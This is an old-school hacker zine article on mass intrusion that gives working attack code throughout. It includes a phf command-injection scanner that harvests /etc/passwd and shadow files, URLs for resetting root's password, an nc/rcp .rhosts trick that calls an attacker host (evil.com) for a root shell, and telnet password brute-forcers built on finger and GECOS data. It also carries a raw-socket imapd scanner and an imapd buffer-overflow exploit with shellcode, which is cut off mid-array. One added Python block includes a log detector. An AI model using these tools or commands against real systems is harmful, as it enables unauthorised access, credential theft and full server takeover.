Modern Techniques, or the axing of today:

- uid (0) responses
- All other phf query responses
- Read message files
- Mass login attempts using finger and shadowed passwd files
- Using test-cgi to list directories

Introduction

Like Bob Dylan said, "the times they are a-changin'". In fact the technique is no longer patience and luck. If you are an oldie you remember the nights you lost trying to brute force servers, sending passwords to the terminal and hoping for a prompt. This article is about mass scans, probes and mass brute force stuff. Some techniques are old, but some still work fine, and combined with some new techniques all you have to do is leave the process running on a 24-hour shell, go party all night, and when you come back you have plenty of stuff to choose from. Let the processor work for you and not your body work for the processor.

Disclaimer

I don't give a damn if you phuck things up, because I'm not responsible for what you do. I'm just here to teach you some techniques; after that it's your own responsibility. Be wise and be careful: the guys on the other side are as smart as you, and even the Best Die like the Rest.

Grabbing some huge server lists

Use this shell script to make a list of the servers in the domains and subnets you choose. It works off "host -l <domain>", which is a DNS zone transfer (AXFR), so it only gives you something when the domain's name server still answers zone transfers to anybody.

scanip.sh
--------------------------------------------Cut here-----------------------------------------------------
#!/bin/bash
# make lists of ips from subnets
# Based on tnt imapd scanner code
# Adapted by D00M, Master of Perversion
# use it with sh scanip.sh <domain> or chmod +x scanip.sh

if [ $# != 1 ]
then
    echo "Usage:"
    echo `basename $0`" <domain>"
    exit
else
    echo "* Scanning domain for hosts."
    # zone transfer the domain and keep only the addresses of the A records
    host -l $1 | grep "has address" | awk -F ' ' '{ print $4 }' > $1.domains
    echo "* Host scan complete."
    echo "* Sorting hosts and removing dupes."
    sort < $1.domains > $1.sorted
    uniq < $1.sorted > $1.domains
    rm -f $1.sorted
fi
--------------------------------------------Cut here-----------------------------------------------------

Do a chmod +x scanip.sh, or run it with sh scanip.sh <domain>, to get a list of IPs to scan. For instance, do sh scanip.sh mil.id and you have all the registered military servers in Indonesia.

Mass phf scan

Some people say phf is lame and old. I can't agree with that: used against one server the odds are small, but used against a whole range of servers the result is great and the potential is huge. As an example, I scanned a huge list of servers in my home country, almost all the registered internal primary domains, and I got some satisfactory results: servers running http daemons as uid(0) (are you aware of the potential?) and lots and lots of passwd files.

Ok, now for the probe. What you need to run the sucker:

1. Perl in the path
2. Lynx in the path
3. 256 char filenames, i.e. unix or OS/2 HPFS (the output files are named after the URL)
4. The source code provided here
5. A list of URLs. For instance use the one in the Indonesian net exposed article, or scan yourself using the shell script above (scanip.sh).

The probe works like this: it reads each of the URLs in the URL file and opens a lynx session with a phf query asking the daemon which id it runs as. If the uid is 0 it stores the result in a specific file and grabs the passwd file into <url>.passwd; if the uid is something else it just grabs the passwd file; if no response is given it carries on to the next URL. The reason this works at all is the %0a: phf passed the Qalias value through escape_shell_cmd(), which never filtered the newline character, so everything after the %0a is run by the shell as a second command under the httpd's uid.

The code follows:

geturl.pl
--------------------------------------------Cut here-----------------------------------------------------
#!/usr/bin/perl
#
# geturl by Nfin8 / Invisible Evil / D00M Master of Perversion
#
# The original code is from Nfin8 and Invisible Evil. I just changed some
# stuff in the output in order to have more explicit output results.
#
# Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/usr/bin/id
# Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
# IF result of first command returns an "id=" then check for user. If user
# is not root then execute the 2nd form.

# Assign null list to @URLs which will be added to later.
my(@URLs) = ();
my($program) = "lynx -dump";

# Pull off filename from commandline. If it isn't defined, then assign default.
my($URLfilename) = shift;
$URLfilename = "urls" if !defined($URLfilename);

# Do checking on input.
die("GetURL: $URLfilename is a directory.\n") if (-d $URLfilename);

# Open and read contents of URL file into @URLs by line.
open(FILE, $URLfilename) or die("GetURL: Cannot open $URLfilename for input.\n");
@URLs = <FILE>;
close(FILE);

# Open output files: every response goes to GetURLResults, the uid 0
# responses also go to RootURLResults.
open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n");
open(ROOTFILE, ">>RootURLResults") or die("RootURL: Cannot open root file.\n");

my($url) = "";
foreach $url (@URLs) {
    print("Now checking: $url");
    chomp($url);
    # ask the daemon who it runs as (the URL is quoted so the shell leaves the ? alone)
    $result = `$program "http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id"`;
    print OUTFILE ("\n============ $url ============\n");
    foreach (split(/\n/, $result)) {
        print OUTFILE ("$_\n");
    }
    if ($result =~ m/id=/i) {
        if ($result =~ m/root/i) {
            print("Logging root response.\n");
            print ROOTFILE ("\n============ $url ============\n");
            foreach (split(/\n/, $result)) {
                print ROOTFILE ("$_\n");
            }
        } else {
            print("Got ID response.\n");
        }
        # either way the daemon runs our commands, so grab the passwd file
        &grab_passwd($url);
    }
}

# We are done. Close the output files and end the program.
close(OUTFILE);
close(ROOTFILE);
exit(0);

# Fetch /etc/passwd through phf and store it in a file named <domain>.passwd
sub grab_passwd {
    my($domainfilename) = shift;
    my($result) = `$program "http://${domainfilename}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"`;
    print("Getting /etc/passwd.\n");
    if (open(PASSWDFILE, ">${domainfilename}.passwd")) {
        print PASSWDFILE ("\n");
        foreach (split(/\n/, $result)) {
            print PASSWDFILE ("$_\n");
        }
        close(PASSWDFILE);
        print("Done! [$domainfilename].\n");
    } else {
        print("FAILED! [$domainfilename].\n");
    }
}
--------------------------------------------Cut here-----------------------------------------------------

Using the probe is as simple as that: cut and paste it into a unix shell, chmod +x the file and run it like ./geturl.pl <url-list>.

A little advice for the masses: phf queries end up in the httpd's access log, whole query string included, so if you want to do this mass thing, use something other than your own system. *Grin*

After that you should get three types of output:

1. GetURLResults, the file that stores ALL the responses from the servers. You don't need this; it's only there so that you can verify which servers were down at the time and didn't answer your request. You can try them later.
2. RootURLResults, the file that stores all the URLs that responded to your id query with uid(0) (not so many as you might suppose; I got 3 in my home country scan).
3. Some files with the format <url>.passwd; each of these is the /etc/passwd file of that URL.

Now that the scan is done, let's get to work.

- uid (0) responses

If you got some uid 0 responses it means every query sent to that server runs with root permissions. If you know some unix commands, use them to get a shell prompt; I'm not here to teach you that, but here are some nice things to do. First learn the phf query format; it's like this:

http://www.victim.com/cgi-bin/phf?Qalias=x%0a

After that put the unix command you like. phf queries don't understand the space character, so use %20 instead. Here are some examples of what you can do.

List root's home directory:

http://www.victim.com/cgi-bin/phf?Qalias=x%0als%20-alg%20/root

Get inside as root. First back up the passwd file:

http://www.victim.com/cgi-bin/phf?Qalias=x%0acp%20/etc/passwd%20/etc/passwd.my

Then change root's passwd to no passwd (if the server lets you; passwd normally wants a terminal to read the new password from, so don't count on it):

http://www.victim.com/cgi-bin/phf?Qalias=x%0apasswd%20root

Then telnet to victim.com, log in as root and do what you need to grab root, but once inside don't forget to do a mv /etc/passwd.my /etc/passwd.

Grab the shadow passwd (do some ls first, because the shadow can be anywhere; here are some defaults):

On BSDi and FreeBSD
http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/master.passwd

On Linux boxes
http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/shadow

On AIX
http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/security/passwd

Well, the potential is enormous. I won't go any further.

- All other phf query responses

Well, in almost all cases what you get as a response is the passwd file. Some are plain passwd files and some are shadowed; the shadowed ones I will talk about later. For the plain passwd files, use john for instance to crack some accounts, and once inside read some stuff on exploits and other techniques to grab root.

If you got some uid answers of 65535, user nobody, root privileges can be obtained by exploiting a problem with /usr/bin/rcp. Many applications are running as 'nobody', in particular the NCSA httpd server, which by default executes all cgi-bin scripts under this uid. This exploit was tested on Linux Red Hat 4.0 and Linux Slackware 3.1. You need a shell account on a unix box and netcat installed. nc is a very important axing tool.
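Before the rcp trick, here is the phf probe logic from above written out in Python. This is an added example, not code from this article or from the geturl.pl authors: it builds the query the same way (x%0a followed by the command, spaces as %20), sorts the id(1) answer into uid 0 / other / nothing the way geturl.pl does but by reading the numeric uid instead of grepping for the word root, and shows the access-log signature the "use another system" advice is about. Every hostname, lynx dump and log line in it is constructed.

```python
# Added example (Python, not code from D00M's article or from the geturl
# authors): build the phf query, classify the id(1) answer, and recognise
# the probe in an access log. All hosts, dumps and log lines are constructed.
import re
from urllib.parse import quote

PHF_PATH = "/cgi-bin/phf?Qalias=x%0a"


def phf_url(host, command):
    """Build a phf query that runs `command` on the httpd's box.

    %0a is a newline; phf passed Qalias through escape_shell_cmd(), which
    did not filter newlines, so the shell runs everything after it as a
    second command. Spaces must be %20, which quote() takes care of.
    """
    return "http://%s%s%s" % (host, PHF_PATH, quote(command, safe="/"))


UID_RE = re.compile(r"uid=(\d+)\(([^)]*)\)")


def classify_id_response(dump):
    """Sort a lynx -dump of the id query the way geturl.pl does.

    Returns None when no id= line came back (phf missing, server down, or
    the command was filtered), otherwise ("root"|"other", username).
    Unlike geturl.pl's bare /root/ match this reads the numeric uid, so a
    page that merely mentions "root" somewhere is not counted as uid 0.
    """
    m = UID_RE.search(dump)
    if not m:
        return None
    uid, name = int(m.group(1)), m.group(2)
    return ("root" if uid == 0 else "other", name)


# The server side of all this: the request line of a Common Log Format
# entry keeps the whole query string, %0a included.
LOG_RE = re.compile(r'"(?:GET|HEAD|POST) ([^" ]+)', re.IGNORECASE)


def is_phf_probe(logline):
    """True when an access-log line carries a phf query with a %0a in it."""
    m = LOG_RE.search(logline)
    if not m:
        return False
    path = m.group(1).lower()
    return "/cgi-bin/phf" in path and "%0a" in path


def run_scan(hosts, fetch, sink=print):
    """The geturl.pl loop: fetch(url) -> text. Returns [(host, verdict)]."""
    out = []
    for host in hosts:
        verdict = classify_id_response(fetch(phf_url(host, "/usr/bin/id")))
        if verdict is not None:
            sink("%s: httpd runs as %s (%s)" % (host, verdict[1], verdict[0]))
        out.append((host, verdict))
    return out


# constructed samples: a uid 0 daemon, a nobody daemon, a miss, two log lines
DUMP_ROOT = "Query Results\n\n/usr/local/bin/ph -m  alias=x\nuid=0(root) gid=0(root)\n"
DUMP_NOBODY = "Query Results\n\n/usr/local/bin/ph -m  alias=x\nuid=65535(nobody) gid=65535(nobody)\n"
DUMP_MISS = "404 Not Found\nThe requested URL /cgi-bin/phf was not found on this server.\n"
LOG_HIT = '10.9.8.7 - - [12/Mar/1998:03:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/id HTTP/1.0" 200 512'
LOG_NORMAL = '10.9.8.7 - - [12/Mar/1998:03:15:22 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 2210'

if __name__ == "__main__":
    # offline demo: a fake fetch() that answers from the constructed dumps
    fake = {"root.example": DUMP_ROOT, "nobody.example": DUMP_NOBODY, "clean.example": DUMP_MISS}
    run_scan(sorted(fake), lambda url: fake[url.split("/")[2]])
    print(phf_url("www.victim.com", "/bin/cat /etc/passwd"))
    print("probe logged:", is_phf_probe(LOG_HIT), "normal lookup:", is_phf_probe(LOG_NORMAL))
```

To run it for real, replace the fake fetch() with something that does the HTTP GET (the article uses lynx -dump). The is_phf_probe() check is the other side of the "phf leaves logs" warning: a single grep for "phf?" with "%0a" in the access log finds every one of these probes.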
I included the zipped file in this zine. Put the file in your shell, then gzip -d <file>, tar -xvf <file> and finally do a make for the system you're using.

The exploit works as follows:

$ echo "+ +" > /tmp/my.rhosts
$ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+/root/.rhosts" | nc -v -w 20 victim.com 80
$ rsh -l root victim.com "/bin/sh -i"
#

What it does is create a temporary rhosts file on your system, rcp it to victim.com's root directory as the new .rhosts file (the + in the query string is the CGI encoding of a space; the "+ +" inside the file means any user from any host), and then call a remote shell with root permission using rsh. For the rcp step to work, victim.com has to be allowed to rcp from hacker@evil.com, so that account on your box needs the same kind of entry in its own .rhosts. If it works you get a # on the victim's server; otherwise a "no permission" message will appear.

Brute force login

This section is some techniques for getting inside the system by brute forcing a login prompt, using some of the outputs of the last section and some new or not so new vulnerabilities.

- Read message files

On most systems all connections are recorded in files called messages. Sometimes when you telnet to a system you do it so fast, or the system is so slow, that instead of typing your login when asked you type your passwd. If you can read these files remotely, and in most cases you can, here's a vulnerability we can use. Let's see how.

First let's see the login error messages. Do this in your browser:

http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/var/log/messages

You'll get a print of a big file on your screen. Now browse it and look for "LOGIN FAILURE" messages; when you find one, write down the login that was typed. Do this for the whole file, and don't forget to do a

http://www.victim.com/cgi-bin/phf?Qalias=x%0als%20-alg%20/var/log

to list the whole dir and see if there are more messages files, because the older messages files are rotated to messages.0 and so on.

When you've finished you should have a list of words to use with john or your custom cracker. Crack the passwd files you got above, and with luck some of the login failures are passwds; even root's passwd could be there.

If the system is shadowed but you can still read the message files, you can try a brute force login with the LOGIN FAILURE words you got. Look at the timestamps: if a user gets a LOGIN FAILURE and then logs in as "mrX", maybe, maybe, the erroneous login is "mrX"'s passwd. It's a question of persistence and luck, but still, it works fine most of the time.

- Mass login attempts using finger and shadowed passwd files

Another possibility for breaking into the system is to use a mass probe that tries lots of logins and passwds until it finds a valid account on the system. You can use whatever info you want, but I advise you to get the most info you can on the system, because in a system with lots of user accounts many tend to use as passwd their login or parts of their real name. In this section we can use the shadowed passwd files that we caught with our probe. The other way, if the system has the finger port open, is to do mass fingers to the system and try the info we get as passwds. You only use finger when we don't have info on the user list inside the server.

To use this probe you need a scripting language called expect. Use the file ex-512.zip included here and then follow the instructions in the installation readme file. It's simple, but by default the archive is prepared to unzip into /usr/bin and /usr/lib; if you don't have root on your system you have to change the header of the script and put the exact location of the binary.

Another thing I advise you to change, if you're using the probe to do mass fingers, is the finger names: put in some common user names of the country you're scanning, because by default it uses English names. If you are using the shadowed passwd files that you got with the geturl script, don't change anything, because the finger part is skipped.

The code follows:

login.exp
--------------------------------------------Cut here-----------------------------------------------------
#!/usr/bin/expect --
set host    [lindex $argv 0]      ;# host is taken from the command line
set account [lindex $argv 1]      ;# ditto the account name
set pw      [lrange $argv 2 end]  ;# the rest are potential passwords
set timeout 60

foreach password $pw {
    puts "\n\nExpect: using $account $password -----------------------------"
    spawn telnet $host
    expect "ogin:"
    send "$account\r"
    expect "assword:"
    send "$password\r"
    # we look for the "Last login" message or shell prompts; on
    # "incorrect" or "invalid" we bail out and try the next password
    expect {
        "ast login" { puts "LOGGED INTO $host $account $password"; send "exit\r" }
        "#$"        { puts "LOGGED INTO $host $account $password"; send "exit\r" }
        "%$"        { puts "LOGGED INTO $host $account $password"; send "exit\r" }
        "\$$"       { puts "LOGGED INTO $host $account $password"; send "exit\r" }
        "incorrect" close
        "invalid"   close
    }
}
exit
--------------------------------------------Cut here-----------------------------------------------------

mf.pl
--------------------------------------------Cut here-----------------------------------------------------
#!/usr/bin/perl
# 'middlefinger'
# Finger a remote host, collect accounts and names,
# or use a provided passwd file.
# Use that data to attempt to login (through login.exp).

$max = 15;                        # how many login.exp sessions run at once
$host = $passwdfile = $debug = $pwlist = 0;

&parser();                        # parse command line
die "Usage: mf.pl [-h<remote host>] [-f<passwdfile>] [-l<password list>] [-d]\n"
    unless $host;
&banner();

# Names to finger. This can obviously be expanded.
@names = qw/mike steve michael mark tim susan cheryl laura john william
            bill jill sue chris adam kathy cathy rebecca joseph joe frank
            tracy tammy christopher alan edward shelly emily carrie terry
            carol caroline paul brian tom thomas heather becky barbara barb
            todd ron ronald david sharon harold frank benjamin jean gene
            lisa lee anthony/;

# Collect account data
if ($passwdfile) {
    open FILE, "$passwdfile" or die "Can't open $passwdfile: $!\n";
    @accountdata = <FILE>;
    close FILE;
    &refine_passwdfile_data();
} else {
    # finger the remote for info
    foreach $name (@names) {
        print "Trying $name...\n" if $debug;
        open PIPE, "finger -l $name\@$host|" or die "No finger $name\@$host: $!\n";
        @accountdata = (@accountdata, <PIPE>);
        close PIPE;
    }
    print "Refining finger data\n" if $debug;
    &refine_finger_data();
}

# Break the list of accounts into smaller arrays, set by the
# variable $max. We want to run a certain number of simultaneous
# shells, but we don't want to max out the ports on the other end
# or hose the connection too bad.
@keys = sort keys %hash;
$index = int($#keys / $max);      # for stepping through the array @keys
for ('0' .. $index) {
    @buffer = splice(@keys, 0, $max);
    # print "buffer: @buffer \nlength: $#keys\n";
    &try_to_login(@buffer);
}
print "\nDone. Exiting...\n";

###
### Subroutines
###

# Attempt to login with each account. Each account gets its own
# login.exp process; the recursion starts all of them before reading
# any results, which is how the "simultaneous" part works.
sub try_to_login {
    my $account = shift;
    return unless $account;
    $level++;
    my $pipe = "PIPE$level";
    open $pipe, "login.exp $host $account @{$hash{$account}}|"
        or warn "No pipe to telnet: $!\n";
    &try_to_login(@_);            # recurse
    print "\n=====================================================\n";
    print "Trying ACCOUNT: $account PASSWORDS: @{$hash{$account}}\n";
    my @lines = <$pipe>;
    close $pipe;
    print "@lines";
    print "\n=====\n";
}

# filter out potential nonpasswords
sub pw_filter {
    my %pws;
    my (@list) = @_;
    print "List: @list\n" if $debug;
    if ($passwdfile) {
        for (@list) {
            unless (length($_) < 5) {
                s/[()']//g;
                $pws{$_}++;
                # five letter words also get a "1" appended as a second guess
                if (length($_) == 5) { $pws{"${_}1"} = "${_}1"; }
            }
        }
    } else {
        # process finger data: drop the finger field labels
        for (@list) {
            unless ($_ =~ /login|login:|name:|name|in|real|life/i || length($_) < 5) {
                s/[()']//g;
                $pws{$_}++;
                if (length($_) == 5) { $pws{"${_}1"} = "${_}1"; }
            }
        }
    }
    print "returning ", join(' ', keys %pws), "\n" if $debug;
    return keys %pws;
}

# parse the command line (-l is accepted but not used by this version)
sub parser {
    for (@ARGV) {
        /^-h/ && do { $host = $';       next; };
        /^-f/ && do { $passwdfile = $'; next; };
        /^-d/ && do { $debug = 1;       next; };
        /^-l/ && do { $pwlist = $';     next; };
    }
}

# Refine finger data
sub refine_finger_data {
    @logins = grep /Login/, @accountdata;
    chomp @logins;
    # Dumb kludge. "@logins = grep /[^?]$/, @logins;" doesn't work.
    for (@logins) {
        /.$/;
        if ($& eq '?') { undef $_; }
    }
    print "filtered logins:\n", join("\n", @logins);
    $results = @logins;
    die "Insufficient account data\n" unless $results;
    # Store login data into data structure
    for (@logins) {
        tr/[A-Z]/[a-z]/;
        s/(\s)+/ /g;
        print "\n\nDespaced: $_\n" if $debug;
        @a = split(/ /);
        print "pw_filter: ", join(' ', &pw_filter(@a)), "\n" if $debug;
        # toggle this depending on finger's output
        # ("Login name: foo   In real life: ..." puts the login in field 2)
        $login = $a[2];           # <----- TOGGLE!
        $hash{$login} = [ &pw_filter(@a) ];
        print "Data: account-> $login, pws-> @{$hash{$login}}\n\n" if $debug;
    }
}

# Refine passwd file data: the login is field 0, the GECOS name is field 4
sub refine_passwdfile_data {
    for (@accountdata) {
        @fields = split(/:/);
        @namedata = split(/,/, $fields[4]);
        print "pwdata: $fields[0] $namedata[0]\n" if $debug;
        $login = $fields[0];
        $namedata[0] =~ tr/A-Z/a-z/;
        @a = split(/ /, $namedata[0]);
        print "pw_filter: ", join(' ', &pw_filter(@a)), "\n" if $debug;
        $hash{$login} = [ &pw_filter($login, @a) ];
        print "Data: account-> $login, pws-> @{$hash{$login}}\n\n" if $debug;
    }
}

sub banner {
    print << "EOLN";
Middle Finger Copyleft (C)1997 Americrack Inc.
"Your Link to Illegal Communications"
EOLN
}
--------------------------------------------Cut here-----------------------------------------------------

To use the probe just cut and paste the login.exp part and put it in your shell, then cut and paste mf.pl and chmod +x both scripts. login.exp is called from inside mf.pl, so don't use any other name for it, and keep it somewhere in your path.

To use it on a shadowed passwd file do

mf.pl -hvictim.com -fshadowfile -lpasswdlistname -d

If the shadowed file exists, the probe builds a passwd list from the logins and the GECOS names in it and then does a mass telnet using the list; if it doesn't, it starts fingering the machine to create the passwd list and finally does the mass telnet stuff. (The -l option is parsed but not used by this version of the script.)

If everything went well you should now have a valid account on the system and you're ready to axe the mothaphucker. *Grin*

- Using test-cgi to list directories

If the machine doesn't have phf and doesn't have the finger port open, well, bad luck, you can't use any of the above, so try another approach. This is one of the possibilities: test-cgi. Basically test-cgi is a cgi-bin script that, if present on a server, can be used to list directories. It echoes its environment back to you, and the old version does it with an unquoted $QUERY_STRING, so the shell expands any * you send as a glob against the server's filesystem. What's the point of listing directories? Well, try listing the /home dir and you get all the users on the system; after that try your luck doing brute force, login equal to passwd. In most cases you get at least one account inside.

The vulnerability works like this. First test if test-cgi is there by doing

machine% echo "GET /cgi-bin/test-cgi?/*" | nc www.victim.com 80

and if so you'll get an output on your terminal similar to this:

CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

Then to browse the /home dir do

machine% echo "GET /cgi-bin/test-cgi?/home/*" | nc www.victim.com 80

and voila, you get an output like this, and lots of logins to test:

CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /ze /manel /pedro /antonio /maria /joana /manuela /francisco /toze /paco /nassa
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

For now you have to do this test one by one, but if you know a bit of perl you can modify the mf.pl script to do mass test-cgi: just add a line to the script doing the test-cgi home dir capture, then change the lines where it works the finger info to create the passwd list; you just need to put there the format sent by the test-cgi query. It's not difficult, and if I have time I'll do that and post it in the next number.

Remote Stuff using info from Mass scans

To finish this article here is another way to get in, this time without any brute force login or passwd cracking. If you get in this way, root owns you. *Grin*

I will talk only about the remote imapd buffer overflow exploit, but there's more; just imapd, because the idea is not the remote itself but the source code to scan for servers with port 143 (imapd) open. The other pop3 and ncsa remotes are very similar in how to use; the only difference is the port you put on the command line, 110 for pop3 and 80 for ncsa, and the offsets to look for. But still, both are old exploits and recent versions are patched. The other remote is samba; it's recent and works fine, and in future editions I suppose someone will say something about it.

The code follows:

imapdscan.c
------------------------------------------Cut here-----------------------------------------------------
/*******************************************************************/
/* ADM imapd scanner the BEST of §THE WORLD ! Made by DA ADM crew  */
/* it needs the output of a host -l target >filez to run           */
/* USAGE is SIMPLE !  ADMimap <your ipZ> <host filz> <delay>       */
/*******************************************************************/
/* VERSION: 1.1                                                    */
/* CoDeuRz: a CoDeuRz of ADM                                       */
/* Greeeetzzzzzz: ADM & HeiKe & some guyz on ***.*******.***       */
/*******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* these two come from the ADM scanner tree and are not in this zine:
   send_pkt(), get_pkt(), IPFILEZ(), pres() and IPHDRSIZE live in them */
#include "../../includes/ADM-spoof.c"
#include "../../includes/pres.c"

/* resolve a name or dotted quad to a network order address, 0 on failure */
unsigned long host2ip(char *serv)
{
    struct sockaddr_in sinn;
    struct hostent *hent;

    hent = gethostbyname(serv);
    if (hent == NULL)
        return 0;
    bzero((char *)&sinn, sizeof(sinn));
    bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

int raw_send, raw_tcp;

int main(int argc, char **argv)
{
    char buffer[4096];
    char buffer2[20];
    int on = 1, goout = 0, goin = 0, timez2 = 0, autotime = 0, regular = 10;
    int resu, auto3 = 0;
    FILE *log;
    FILE *IPSRC;
    FILE *HOSTF;
    struct in_addr src;
    struct iphdr *ip = (struct iphdr *)buffer;
    struct tcphdr *tcp = (struct tcphdr *)(buffer + IPHDRSIZE);

    pres();
    printf("ADMimap ver 1.1 (c) ADM\n");
    if (argc < 4) {
        printf("\nusage: ADMimap <yourIP> <IP file> <delay>\n");
        printf("\n<yourIP> = ADMimap needs your IP for make the scan\nbut u can scan with www.nasa.gov if u want ;))\n");
        printf("<IP file> = the filez of ip u want scan\ntry a :# host -l nasa.gov > ipfilez for scan ALL nasa.gov\n");
        printf("<delay> = define the delay in second for waiting the ACK type 0 for auto\n");
        exit(0);
    }

    /* turn the host -l output into a plain list of IPs in the file IPSRC */
    HOSTF = fopen(argv[2], "r");
    if (HOSTF == NULL) {
        perror("fopen");
        exit(1);
    }
    IPSRC = fopen("IPSRC", "w+");
    if (IPSRC == NULL) {
        perror("fopen");
        exit(1);
    }
    IPFILEZ(HOSTF, IPSRC);
    fclose(HOSTF);
    rewind(IPSRC);

    log = fopen("imapdlog", "w");
    if (log == NULL) {
        perror("fopen");
        exit(1);
    }
    raw_send = socket(AF_INET, SOCK_RAW, 255);
    if (raw_send == -1) {
        printf("cant open raw socket for sending\n");
        exit(1);
    }
    raw_tcp = socket(AF_INET, SOCK_RAW, 6);
    if (raw_tcp == -1) {
        printf("can't open raw socket for receiving\n");
        exit(1);
    }
    ioctl(raw_tcp, FIONBIO, &on);

    /* delay 0 means auto: keep polling for "regular" rounds per host sent */
    timez2 = atoi(argv[3]);
    if (timez2 == 0) {
        auto3 = 1;
        printf(" AUTO ON ! \n");
    } else {
        timez2 = timez2 * 50;
    }

    for (;;) {
        /* one SYN to port 143 per host, from our source port 2666 */
        if (!feof(IPSRC)) {
            fscanf(IPSRC, "%s", buffer2);
            printf(" sendto %s\n", buffer2);
            autotime++;
            send_pkt(raw_send, host2ip(argv[1]), host2ip(buffer2),
                     2666, 143, TH_SYN, 111, 111, 0, NULL, 0);
        }
        if (feof(IPSRC))
            goout = 3;
        if (goout > 1) {
            usleep(1);
            goin++;
        }
        if (auto3 == 1) {
            if (goin > autotime * regular) {
                fclose(log);
                exit(0);
            }
        } else {
            if (goin > timez2) {
                fclose(log);
                exit(0);
            }
        }
        /* pick up replies: a SYN|ACK (flags == 18) from 143 to our port means open */
        buffer[0] = '0';
        get_pkt(raw_tcp, buffer, 400);
        if (buffer[0] != '0') {
            if (tcp->th_dport == htons(2666) && tcp->th_sport == htons(143)) {
                resu = (tcp->th_flags | TH_ACK);
                if (resu == 18) {
                    src.s_addr = ip->saddr;
                    fprintf(log, "imapd on %s\n", inet_ntoa(src));
                    fflush(log);
                }
            }
        }
    }
    fclose(log);
    return 0;
}
------------------------------------------Cut here-----------------------------------------------------

Cut and paste the C code into a shell, then compile with cc -o imapdscan imapdscan.c. Note that the two #include lines pull ADM-spoof.c and pres.c from the ADM scanner tree; those files are not in this zine, so you need the ADM package next to it for this to compile. It opens raw sockets, so it needs root on the scanning box too.

To use the probe you need a list of servers to scan; use the scanip.sh shell script to scan subnets for servers and use the output file in the probe.

Now that you have a server list and the probe compiled, let's scan for open imapd on each one. Type

imapdscan <your ip> <ip list> 0

and the probe starts scanning. You can do a ctrl-z to suspend it and use the command bg to put it in the background, drink some beers and wait till it finishes checking. You should get an output file called imapdlog; there you have all the servers with the imapd service open.

Now let's check if the sucker is vulnerable to the remote imapd exploit. Cut the following source code and compile it in a shell using cc -o imapd imapd.c

imapd.c
--------------------------------------------Cut here-----------------------------------------------------
/*
 * IMAPd Linux/intel remote xploit by savage@apostols.org 1997-April-05
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
 *
 * usage:
 *   $ (imap 0; cat) | nc victim 143
 *            |
 *            +--> usually from -100 to 100
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* NOP sled, then the execve("/bin/sh") shellcode */
char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
